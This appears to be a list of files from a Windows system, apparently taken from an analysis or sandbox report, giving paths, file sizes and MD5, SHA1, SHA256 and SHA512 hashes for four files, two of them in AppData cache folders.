C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\784edc71-a195-4721-a2ab-93c1c77d4f1f.down_data
Filesize 555KB
MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize 290B
MD5 00676c1d2bd2d990f1d9144c5f75f891
SHA1 aca12b6c5e8dd056725e4eba02aa023729b29344
SHA256 b05e838ec67ad7ce427df5bc3bc6e6620b77b87fb51ce83b00718d8aa1e134e7
SHA512 69d1125a474625124d1707d3c06d135aa0af124229ba1722604fc36915e619519b4c869db09cc8aa5345bf59db477759e3003d192f98ddc64b9865007556f49a
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 2.9MB
MD5 1976cb5215470bbbfe6ea766aa2b9253
SHA1 a9c899dbc512a5e8356731d4b1804fcbe4f6101b
SHA256 dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff
SHA512 d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3